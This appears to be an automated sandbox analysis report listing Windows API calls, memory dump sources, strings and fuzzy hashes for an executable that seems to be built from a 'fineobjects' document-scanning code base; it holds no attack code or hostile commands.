                                                                                                • LeaveCriticalSection.KERNEL32(?,00000000,?,?), ref: 004864E8
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00486509
                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?), ref: 00486527
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048654C
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$InterlockedLeaveValue$DecrementEnter$Exception@8IncrementThrow
                                                                                                • String ID: (US$@fO$@fO$@fO$@fO$XUS$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$|US
                                                                                                • API String ID: 4245376274-3595604072
                                                                                                • Opcode ID: 8fb5c3528225373dedaae442264899f992c71a2ad6bbd993aa4c6099200b832e
                                                                                                • Instruction ID: 0e791c5d5d168442b7b652719a19f9905ca8ff0820f22f561b5031a87a6f914d
                                                                                                • Opcode Fuzzy Hash: 8fb5c3528225373dedaae442264899f992c71a2ad6bbd993aa4c6099200b832e
                                                                                                • Instruction Fuzzy Hash: 17B11170900644DFDB10EF68D945BAEBBF1BF24304F15454EE845AB391E778A908CF99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenClipboard.USER32(?), ref: 00455191
                                                                                                • EmptyClipboard.USER32 ref: 004551A1
                                                                                                  • Part of subcall function 00455410: InterlockedDecrement.KERNEL32(?), ref: 00455493
                                                                                                  • Part of subcall function 00455410: InterlockedDecrement.KERNEL32(?), ref: 004554E5
                                                                                                  • Part of subcall function 00455410: InterlockedDecrement.KERNEL32(000000FF), ref: 00455501
                                                                                                  • Part of subcall function 00455410: InterlockedDecrement.KERNEL32(000000FF), ref: 0045555B
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000002,?,00000000,?), ref: 004551DB
                                                                                                • GlobalLock.KERNEL32 ref: 004551F3
                                                                                                • GlobalFree.KERNEL32 ref: 004551FA
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00455219
                                                                                                • SetClipboardData.USER32 ref: 0045521E
                                                                                                • GlobalAlloc.KERNEL32(00000002,?), ref: 0045523D
                                                                                                • GlobalLock.KERNEL32 ref: 0045524F
                                                                                                • GlobalFree.KERNEL32 ref: 00455256
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00455271
                                                                                                • SetClipboardData.USER32 ref: 00455276
                                                                                                • CloseClipboard.USER32 ref: 0045527C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00455290
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004552AF
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Global$DecrementInterlocked$Clipboard$AllocDataFreeLockUnlockValue$CloseEmptyOpen
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 2535377466-1285152028
                                                                                                • Opcode ID: 2bb3872f46c38a413eefa9577ab8d0a1c1e095fa64819e030dff0440a0a64410
                                                                                                • Instruction ID: 3d82cc2e49c73363152fc84d19db79f1e50d88f2d0a3a11b6b394e38d64e4818
                                                                                                • Opcode Fuzzy Hash: 2bb3872f46c38a413eefa9577ab8d0a1c1e095fa64819e030dff0440a0a64410
                                                                                                • Instruction Fuzzy Hash: 2341D031900A15ABDB11ABA5CC49FBF7BB8EF45715F00012AF900A7353DB38AD11CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSystemInfo.KERNEL32(00000003,?,?,?,?,00000003,?,?,00496986,0050AE64,00000000,00000003,00000000,?,00000003), ref: 004972B2
                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,00000003,?,?,00496986,0050AE64,00000000,00000003,00000000,?,00000003), ref: 004972F3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00497331
                                                                                                • MapViewOfFile.KERNEL32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,00000000,?,?,?,?,?), ref: 00497364
                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,?,00000000,00000000,?,?,?,?,?,?,00000003), ref: 00497378
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInfoSectionSystemValue$EnterErrorException@8FileLastLeaveThrowUnothrow_t@std@@@View__ehfuncinfo$??2@
                                                                                                • String ID: @fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\alloc.cpp$d:\build\teamagent\_work\1\s\0\fineobjects\src\filemapping.cpp
                                                                                                • API String ID: 1878309574-2406364437
                                                                                                • Opcode ID: c5e3c9aa1b8ff06a454c6fb369dabdab79c509b689201580c9744af3a86bbc30
                                                                                                • Instruction ID: 1491a5fef144e039f942289b70f0505a42f9334ebd2c15bb5f756011256ba007
                                                                                                • Opcode Fuzzy Hash: c5e3c9aa1b8ff06a454c6fb369dabdab79c509b689201580c9744af3a86bbc30
                                                                                                • Instruction Fuzzy Hash: 1F51C471A107059BDF20DF698C45BBB7BA9EB84710F11456FFC05A7381E778A801CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 004CF136
                                                                                                • _free.LIBCMT ref: 004CF15A
                                                                                                • _free.LIBCMT ref: 004CF2E1
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004F35E0), ref: 004CF2F3
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00533D8C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CF36B
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00533DE0,000000FF,?,0000003F,00000000,?), ref: 004CF398
                                                                                                • _free.LIBCMT ref: 004CF4AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                • String ID: 5O
                                                                                                • API String ID: 314583886-2690845227
                                                                                                • Opcode ID: b558221dfaef3fdd48e62d36e8f87fcb402e48337f8d47788917259007b39918
                                                                                                • Instruction ID: 1287e216547593ec2c6e54112d8a24c882a6dce788d096e8a1a35b4b2882461d
                                                                                                • Opcode Fuzzy Hash: b558221dfaef3fdd48e62d36e8f87fcb402e48337f8d47788917259007b39918
                                                                                                • Instruction Fuzzy Hash: F8C1467D900245ABCB609F79D801FAA7BBAAF55350F1440BFE840D7352EB3D8E0A8758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00477107
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004772FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: gfff$gfff$gfff$xMS
                                                                                                • API String ID: 2172605799-1544097683
                                                                                                • Opcode ID: b674e8a1dd87ea02f0965e507f81e06d1245534b6159f39cfbbf843d8267b130
                                                                                                • Instruction ID: 82e62ddce72f30a5af21ff9a041becc155dc4d6ab825ea15cf26ce18368f7b77
                                                                                                • Opcode Fuzzy Hash: b674e8a1dd87ea02f0965e507f81e06d1245534b6159f39cfbbf843d8267b130
                                                                                                • Instruction Fuzzy Hash: C671D271604606CFCB18DF29C891AAAB7B5FF49304B49C1ADE81ADB361DB34ED01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0048A411
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048A449
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • GetLastError.KERNEL32 ref: 0048A429
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\nativefilesystem.cpp, xrefs: 0048A3D6
                                                                                                • @fO, xrefs: 0048A3E0
                                                                                                • xMS, xrefs: 0048A456
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterErrorException@8FileFindFirstInterlockedLastLeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\nativefilesystem.cpp$xMS
                                                                                                • API String ID: 705981693-3802361733
                                                                                                • Opcode ID: 1fe8495d4f177d20c367bb3ff36267b53bb2530ed2a01d47331c477829d18d96
                                                                                                • Instruction ID: af80de532606f7bcef8a4bb299e63e4ceedcc215388066c35c1042670c5f0216
                                                                                                • Opcode Fuzzy Hash: 1fe8495d4f177d20c367bb3ff36267b53bb2530ed2a01d47331c477829d18d96
                                                                                                • Instruction Fuzzy Hash: F5110371540615AFEB20AF28CC06B6F7764FB01B20F148A2BF865933D1D7B99820CB89
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004CB8AC: GetLastError.KERNEL32(?,?,004BDF45,?,00000000,?,004BE1F9,004844FC,?,00000000,?,004844FC,00000000,?,?), ref: 004CB8B0
                                                                                                  • Part of subcall function 004CB8AC: _free.LIBCMT ref: 004CB8E3
                                                                                                  • Part of subcall function 004CB8AC: SetLastError.KERNEL32(00000000,?,004BE1F9,004844FC,?,00000000,?,004844FC,00000000,?,?), ref: 004CB924
                                                                                                  • Part of subcall function 004CB8AC: _abort.LIBCMT ref: 004CB92A
                                                                                                  • Part of subcall function 004CB8AC: _free.LIBCMT ref: 004CB90B
                                                                                                  • Part of subcall function 004CB8AC: SetLastError.KERNEL32(00000000,?,004BE1F9,004844FC,?,00000000,?,004844FC,00000000,?,?), ref: 004CB918
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004D2275
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004D22D0
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 004D22DF
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004C4FE4,00000040,?,004C5104,00000055,00000000,?,?,00000055,00000000), ref: 004D2327
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,004C5064,00000040), ref: 004D2346
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: ab43f10203bc7eca40adb8b5f977b69f21634a56566749f12ecc8c03cea00c4b
                                                                                                • Instruction ID: f120f2368d48782acaebdadd59a7f8bd5c897348e934556aea94328f459ba4c1
                                                                                                • Opcode Fuzzy Hash: ab43f10203bc7eca40adb8b5f977b69f21634a56566749f12ecc8c03cea00c4b
                                                                                                • Instruction Fuzzy Hash: 7751A171A00206ABDB10DFA5DD55ABFB7B8BF64700F0444ABF910E7391E7B89900CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00477F10: InterlockedDecrement.KERNEL32(004E3D31), ref: 00478000
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 0048C0DE
                                                                                                • GetLastError.KERNEL32 ref: 0048C0ED
                                                                                                  • Part of subcall function 0046D630: InterlockedIncrement.KERNEL32(00000000), ref: 0046D69D
                                                                                                  • Part of subcall function 0046D630: __CxxThrowException@8.LIBVCRUNTIME ref: 0046D6BB
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048C133
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$DiskErrorException@8FreeIncrementLastSpaceThrow
                                                                                                • String ID: xMS
                                                                                                • API String ID: 3042005516-303485436
                                                                                                • Opcode ID: d3d0ac33274fa857612ca711dcedc71141b4a7ca2a9c97f7c953a89fdb2d2a2b
                                                                                                • Instruction ID: 71714c14a55b9611c91131880e693c03dfebdb6b95f61061a03d002813f3a634
                                                                                                • Opcode Fuzzy Hash: d3d0ac33274fa857612ca711dcedc71141b4a7ca2a9c97f7c953a89fdb2d2a2b
                                                                                                • Instruction Fuzzy Hash: 11219531A0020A9BCB10EF59C844BAEBB75EF45764F108719F814A7281DB349905CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(00534020,00000000,?,0000000A,00415A52), ref: 004742CF
                                                                                                • InterlockedExchange.KERNEL32(0053401C,00000001), ref: 004742FF
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 004742E9
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp, xrefs: 004742DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8ExchangeInterlockedLeaveThrowVersion
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 417680594-2274833300
                                                                                                • Opcode ID: 2e770300db58ee696dec9b59a2924ee5dd520303d485096f552eaa77c40b35c1
                                                                                                • Instruction ID: 4139282e17a79be686f1bb7902fef5e0fd178676ebf656e1f81d6321e2e5130d
                                                                                                • Opcode Fuzzy Hash: 2e770300db58ee696dec9b59a2924ee5dd520303d485096f552eaa77c40b35c1
                                                                                                • Instruction Fuzzy Hash: FFF0243274031057DB2817056C0BBF7639093E0B23F21412BFB09DA2D0E7B5A4456A9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004106D0: InterlockedIncrement.KERNEL32 ref: 00410752
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E3E7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E42F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E477
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E4BF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E507
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E54F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E597
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E5DF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E627
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E6B7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E6FF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E747
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E78F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E7D7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E81F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E867
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040E66F
                                                                                                  • Part of subcall function 00483EC0: EnterCriticalSection.KERNEL32(00534D78), ref: 00483F16
                                                                                                  • Part of subcall function 00483EC0: LeaveCriticalSection.KERNEL32(00534D78,@fO), ref: 00483F6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalIncrementSection$EnterLeave
                                                                                                • String ID: &d:TZrzdafxIh,>:$&d:gr>:S<<h<aIh,>:xjo,UIhNdk:<U,zspxjo,UIhNdk:<U,zsfxIh,>:$&d:jryrHUWU:Ud>Fd>:k:r:c>aIh,>:xjo,UIhNdk:<U,zsfxIh,>:$&d:kIr,,d<k:r:c>aIh,>:xjo,UIhNdk:<U,zsfxIh,>:$&d:kd<Vd<)<hId>>TNafxIh,>:$&d:kd<Vd<k:r:c>afxIh,>:$&d:khc<Id>ajq<<rPwjo,UIhNdk:<U,zOsfxIh,>:$&d:khc<IdT,ChaIh,>:xjo,UIhNdk:<U,zsfxIh,>:$&d:khc<IdjryrHUWU:Ud>aIh,>:xjo,UIhNdk:<U,zsfxIh,>:$Fd>:khc<IdjryrHUWU:Ud>aIh,>:xjo,UIhNdk:<U,zsfxIh,>:$hVS$jr,IdWkIr,aIh,>:xjo,UIhNdk:<U,zsfxIh,>:$kGh(nr:UVdkIr,XUrWhzaIh,>:xjo,UIhNdk:<U,zspxIh,>:xjo,UIhNdk:<U,zspx__U,:64fxIh,>:$kIr,EhNcWd kIr,kd<Vd<$kIr,aIh,>:xjo,UIhNdk:<U,zspxIh,>:xjo,UIhNdk:<U,zspx__U,:64pxj):<wIh,>:xkIr,Er,rzd< TkIr,kd::U,z>OfxIh,>:$kIr,kd<Vd<af$oyNr:dkhc<Id>afxIh,>:$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$~kIr,kd<Vd<af$@
                                                                                                • API String ID: 1121898109-1005651067
                                                                                                • Opcode ID: 2b2af8830482a2273474eb88472f8d3edce2f71867f75f4a59893a0dee57b649
                                                                                                • Instruction ID: 5daa446835d41f543ea8cc05fbbb855d713e67765d9789999affa34966ee568b
                                                                                                • Opcode Fuzzy Hash: 2b2af8830482a2273474eb88472f8d3edce2f71867f75f4a59893a0dee57b649
                                                                                                • Instruction Fuzzy Hash: 04F1A3B1901659AADB01EFA1CD05BEF7BB8BF54304F10085AE54077281DBB86F44DBBA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(74E07150), ref: 0041A1C9
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041A1E2
                                                                                                • InterlockedDecrement.KERNEL32(74E07150), ref: 0041A20E
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041A227
                                                                                                • GetCommandLineW.KERNEL32 ref: 0041A264
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0041A2E1
                                                                                                • InterlockedDecrement.KERNEL32(00000002), ref: 0041A2EA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041A308
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0041A4F3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0041A4FF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041A51D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CommandLine
                                                                                                • String ID: ..\Shared\ScanEngine.cpp$@fO$@fO$@fO$@fO$app$cep$langcode$ozA$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$CS
                                                                                                • API String ID: 2065363632-2287293357
                                                                                                • Opcode ID: 6c584c1ecac8dc0b5b076cdf0cb3c3a7b9dc4840f75cb8c9b77d5a73ebc9348a
                                                                                                • Instruction ID: bef5190e700973c0b2858f9dfbe4afd21105343a53d4756587f25789c9ae7a76
                                                                                                • Opcode Fuzzy Hash: 6c584c1ecac8dc0b5b076cdf0cb3c3a7b9dc4840f75cb8c9b77d5a73ebc9348a
                                                                                                • Instruction Fuzzy Hash: B7E1BF75901205ABCB04EFA4CC51BEFBBB5EF45304F14445AE90167392EB38AE15CBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00499413
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00499438
                                                                                                • EnterCriticalSection.KERNEL32(00535528), ref: 00499498
                                                                                                • LeaveCriticalSection.KERNEL32(00535528,?), ref: 004994BD
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004994E5
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004994FA
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00499525
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049952E
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00499551
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00499557
                                                                                                • EnterCriticalSection.KERNEL32(00535694), ref: 0049958F
                                                                                                • LeaveCriticalSection.KERNEL32(00535694,00530380), ref: 004995D0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00499623
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 00499746
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00499764
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049977C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
